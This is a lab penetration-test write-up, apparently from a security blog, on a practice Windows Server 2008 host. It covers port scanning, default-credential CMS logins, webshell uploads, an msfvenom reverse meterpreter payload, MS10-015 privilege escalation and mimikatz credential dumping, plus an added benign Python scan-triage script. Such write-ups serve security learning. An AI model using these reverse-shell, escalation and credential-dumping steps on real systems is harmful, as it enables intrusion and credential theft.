Notes on a test against Windows Server 2008 (x64) Datacenter Edition

Getting started

Environment: IIS 7.0 + MSSQL 2008 + Symantec 3.3; Apache/2.2.15 + MySQL 5.5.27 + php-5.3.15
Attacker box: Kali 2019
Thanks to @klion for providing the environment
I will keep studying security testing on Windows

Initial testing

root@kali:~# nmap -sC -sV 192.168.3.13
PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| GetRequest, TerminalServerCookie, oracle-tns:
|_ telnet
80/tcp open http Apache httpd 2.2.15 ((Win32) PHP/5.3.15)
|_http-server-header: Apache/2.2.15 (Win32) PHP/5.3.15
|_http-title: phpinfo()
82/tcp open http Microsoft IIS httpd 7.0
| http-cookie-flags:
| /:
| ASPSESSIONIDQCSTBQCD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xC6\xFB\xB3\xB5\xC5\xE4\xBC\xFE\xC6\xF3\xD2\xB5\xCD\xF8\xD5\xBE\xB9\xDC\xC0\xED\xCF\xB5\xCD\xB3v1.0--\xCA\xD7\xD2\xB3
84/tcp open http Microsoft IIS httpd 7.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xE5\x8C\x97\xE4\xBA\xAC\xE4\xB8\x8A\xE4\xBA\x91CMS\xE7\xB3\xBB\xE7\xBB\x9F
85/tcp open http Microsoft IIS httpd 7.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xE6\xAC\xA2\xE8\xBF\x8E\xE4\xBD\xBF\xE7\x94\xA8\xE9\x94\x90\xE5\x95\x86\xE4\xBC\x81\xE4\xB8\x9ACMS - \xE5\x9F\xBA\xE4\xBA\x8E COMSHARP CMS
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server (R) 2008 Datacenter 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600.00; RTM
| ms-sql-ntlm-info:
| Target_Name: IIS70-CN
| NetBIOS_Domain_Name: IIS70-CN
| NetBIOS_Computer_Name: IIS70-CN
| DNS_Domain_Name: IIS70-CN
| DNS_Computer_Name: IIS70-CN
|_ Product_Version: 6.0.6001
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-09-21T08:07:44
|_Not valid after: 2049-09-21T08:07:44
|_ssl-date: 2019-09-22T02:21:58+00:00; -1s from scanner time.
2383/tcp open ms-olap4?
3306/tcp open mysql MySQL 5.5.27
| mysql-info:
| Protocol: 10
| Version: 5.5.27
| Thread ID: 5
| Capabilities flags: 63487
| Some Capabilities: ConnectWithDatabase, Support41Auth, Speaks41ProtocolOld, FoundRows, SupportsCompression, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, IgnoreSigpipes, InteractiveClient, LongColumnFlag, LongPassword, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: {=Z1$_4#SW;aUh-BH~gg}
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2019-09-22T02:21:58+00:00; -1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
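The scan output above is the sort of thing a defender wants to triage automatically, and the http-title fields are \xNN-escaped raw bytes that nmap does not decode (GBK for port 82, UTF-8 for ports 84 and 85). The following Python script is an added example by the editor, not code from the original post: it parses nmap's normal output, groups each port with its NSE script lines, decodes the escaped titles (trying UTF-8, then GBK), and turns the observations into remediation findings (TRACE enabled, session cookie without HttpOnly, SMB/database/RDP reachable from the scanner). The sample input is a constructed subset of the scan lines from the post; the finding texts and the encoding fallback order are the editor's assumptions.

```python
import re

# Constructed sample: a subset of the nmap -sC -sV lines shown in the post.
SAMPLE_SCAN = r"""PORT STATE SERVICE VERSION
23/tcp open telnet?
| fingerprint-strings:
| GetRequest, TerminalServerCookie, oracle-tns:
|_ telnet
82/tcp open http Microsoft IIS httpd 7.0
| http-cookie-flags:
| /:
| ASPSESSIONIDQCSTBQCD:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.0
|_http-title: \xC6\xFB\xB3\xB5\xC5\xE4\xBC\xFE\xC6\xF3\xD2\xB5\xCD\xF8\xD5\xBE\xB9\xDC\xC0\xED\xCF\xB5\xCD\xB3v1.0--\xCA\xD7\xD2\xB3
84/tcp open http Microsoft IIS httpd 7.0
|_http-title: \xE5\x8C\x97\xE4\xBA\xAC\xE4\xB8\x8A\xE4\xBA\x91CMS\xE7\xB3\xBB\xE7\xBB\x9F
445/tcp open microsoft-ds Windows Server (R) 2008 Datacenter 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600.00; RTM
3306/tcp open mysql MySQL 5.5.27
3389/tcp open ssl/ms-wbt-server?
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def decode_title(raw):
    """Turn an nmap \\xNN-escaped http-title into text.

    nmap prints non-ASCII title bytes as \\xNN escapes. We rebuild the bytes
    and try UTF-8 first, then GBK (common on Chinese-language Windows hosts).
    Returns (decoded_text, encoding_used).
    """
    if "\\x" not in raw:
        return raw, "ascii"
    data = raw.encode("latin-1").decode("unicode_escape").encode("latin-1")
    for enc in ("utf-8", "gbk"):
        try:
            return data.decode(enc), enc
        except UnicodeDecodeError:
            continue
    return data.decode("latin-1"), "latin-1"


def parse_nmap(text):
    """Group each port line with the '|' / '|_' script lines that follow it."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip(),
                          "script": [], "title": None, "title_encoding": None})
        elif line.startswith("|") and ports:
            entry = line.lstrip("|_ ").strip()
            ports[-1]["script"].append(entry)
            if entry.startswith("http-title:"):
                title, enc = decode_title(entry.split(":", 1)[1].strip())
                ports[-1]["title"], ports[-1]["title_encoding"] = title, enc
    return ports


def triage(ports):
    """Map scan observations to defender findings as (port, message) tuples."""
    findings = []
    for p in ports:
        port = p["port"]
        for entry in p["script"]:
            if "Potentially risky methods" in entry and "TRACE" in entry:
                findings.append((port, "HTTP TRACE enabled: disable the method (cross-site tracing exposure)"))
            if "httponly flag not set" in entry:
                findings.append((port, "session cookie lacks HttpOnly: set the flag on the session cookie"))
        if port == 445:
            findings.append((port, "SMB reachable from the scanner: restrict access and verify MS17-010 patch state"))
        if port in (1433, 3306):
            findings.append((port, f"{p['service']} listening on the network: bind to localhost or firewall it"))
        if port == 3389:
            findings.append((port, "RDP exposed: require NLA and restrict source addresses"))
    return findings


def analyze(text):
    """Convenience wrapper: returns ({port: record}, findings)."""
    ports = parse_nmap(text)
    return {p["port"]: p for p in ports}, triage(ports)


if __name__ == "__main__":
    by_port, findings = analyze(SAMPLE_SCAN)
    for port, rec in sorted(by_port.items()):
        if rec["title"]:
            print(f"{port}/tcp title ({rec['title_encoding']}): {rec['title']}")
    for port, msg in findings:
        print(f"[{port}] {msg}")
```

Running the script directly prints the decoded titles and the findings for the embedded sample; to use it on a real scan, pass the contents of an `-oN` file to `analyze()`. The GBK fallback is what recovers the port-82 title, whose first byte pair is not valid UTF-8.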

Port 23

Nothing found yet

Port 80: Joomla 2.5.20

15.png

root@kali:~# whatweb -a 3 -v http://192.168.3.13/Joomla_2.5.20/

16.png
whatweb's support for foreign CMSes is fairly good; for domestic ones, Yunxi (云悉) does somewhat better
administrator/index.php is the backend login page, admin:admin
17.png
Found the page for editing/adding extensions
18.png
Uploaded a webshell (it kept reporting that the upload failed, but it had actually succeeded)
19.png
Uploaded a Behinder (冰蝎) shell; AntSword (蚁剑) errored out, probably the AV or similar blocking my connection.
20.png

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.128
LHOST => 192.168.3.128
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
Server username: SYSTEM (0)

Note: the commands available in the php and Windows meterpreter modules differ quite a bit

Port 82: 企成网站管理系统 2.0 (Qicheng Website Management System)

Let's see what the homepage looks like
1.png
First time I've seen the password left out in the open
2.png
A quick scan turned up the admin backend
3.png
Logged in: nothing there
Scanned again and found the eWebEditor editor
4.png
Following a Baidu search, downloaded the db/ewebeditor.mdb database
5.png
Got admin:swit999, version 2.8
Uploaded a webshell and connected with AntSword
6.png
Uploaded a backdoor and connected with msf

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.10 lport=4444 -f exe -o test.exe
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.10
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

At this point getsystem is no longer enough
At low privilege, Windows-Exploit-Suggester is very helpful

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
msf5 post(multi/recon/local_exploit_suggester) > exploit

7.png
It has already identified a usable exploit for us
Fed the systeminfo output to a privilege-escalation helper site, which reported MS17-010; one attempt and the box blue-screened
Using MS10-015 instead

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 192.168.3.10
msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4445
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 2
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Dump a password

meterpreter > load mimikatz
meterpreter > kerberos

8.png
Log in with it
9.png

Port 84: sycms

10.png
The scan gets killed immediately; there must be a WAF or similar
Guessed the backend at /admin, guessed the password admin:admin888
11.png
Saw an editor, guessed which one, and got CKFinder; oh no, can't upload a webshell through it
Found a file backup/restore feature; hid the shell inside a file and ran a backup/restore
12.png
AntSword died, can't connect, very likely being intercepted
Switched to Behinder, connected successfully
13.png
Used Behinder to spawn a reverse meterpreter shell

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

After that it's the same routine

Port 85: 锐商企业CMS (Ruishang Enterprise CMS)

14.png
Same old routine: admin:admin logs into the backend
21.png
But the current file has no execute permission; try relocating the webshell
22.png
Changed the path to /, and found the file uploaded to the root directory
Connected with Behinder, handed off to msf

meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

That's it

If you spot any errors, contact lanbaidetanlang@qq.com
